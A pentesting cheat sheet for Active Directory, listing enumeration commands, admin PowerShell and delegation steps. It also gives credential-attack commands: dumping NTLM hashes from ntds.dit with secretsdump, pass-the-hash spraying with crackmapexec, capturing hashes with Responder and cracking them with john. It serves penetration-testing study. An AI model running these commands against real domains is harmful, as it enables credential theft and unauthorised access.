Active Directory Pentesting
Last modified: 2023-07-19
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.
Enumeration
Seatbelt is an enumeration tool.
From Outside
# Domain Controllers (DNS) discovery
dig @<target-ip> <domain-name> any
ffuf -u https://FUZZ.example.com -w subdomains.txt -mc 200,301,302,403
gobuster dns -d example.local -w subdomains.txt -t 25
# Dump password hashes from ntds.dit and system.hive
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL -outputfile hashes
# If we want NTLM hash only in dumped hashes, cut each line.
cut -d: -f3,4 hashes.ntds > hashes.txt
# We can use the file for brute forcing SMB credentials. For example,
crackmapexec smb <target-ip> -u <username> -H hashes.txt
From Inside
# List all users in the AD domain
net user /domain
# Specific user
net user <username> /domain
PS> Get-ADUser -Identity <username> -Server dc.example.com -Properties *
# Filters
PS> Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
# List all groups of the AD domain
net group /domain
# Specific group
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
# List the group members
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
# List the password policy of the AD domain
net accounts /domain
# List AD objects
PS> $ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
PS> Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
# Retrieve information about the given domain.
PS> Get-ADDomain -Server dc.example.com
# Change the password of the AD user
PS> Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\
Microsoft Management Console (mmc)
To setup the AD, follow this instructions:
- Right-click on the Windows icon.
- Click "Run" and enter "mmc" then click "OK".
- In the MMC, click "File → Add or Remove Snap-ins".
- Add all three "Active Directory…" snap-ins.
- Right-click on the "Active Directory…" in the left pane and select "Change Forest".
- Enter the domain as the Root domain and click OK.
- Click on "View → Advanced Features".
Naming Convention
If we found usernames list in Active Directory, we can modify usernames with naming convention.
For instance,
john smith -> jsmith, j.smith
michael pole -> mpole, m.pole
SSH Login with AD Credentials
ssh dc.example.com\\<ad_username>@sub.dc.example.com
Inject Credentials into Memory
# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe
DNS Configuration
# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
Now check if the configuration is set correctly.
nslookup dc.example.com
Basic Knowledge
User Management
-
Delegation
In Active Directory, the administrator delegate another user to manage users over an Organizational Unit (OU), without the admin privileges.
-
Setup
- Open "Active Directory Users and Computers".
- Right-click on the target OU, and click “Deligate Control…”. Then the new window will open.
- In the window, input username who you want to delegate the privilege that manage users.
- Select tasks to which the delegated user should manage.
- Click OK.
-
Manage Users
-
Logon as the delegated user.
-
For instance, if you want to reset the john's password, execute the following command in PowerShell. Then input new password in prompt.
Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
-
The first time John logs on after that, we want John to change his arbitrary password not the password you entered. So that to, execute the following command.
Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
-
Now when John logs on he will be prompt to change a new password.
-
-
Intercept NetNTLM Authentication
Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.
sudo responder -I <interface-like-eth0>
Leave Responder running until receiving some requests.
If you get NTLM hash, crack it in local machine.
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt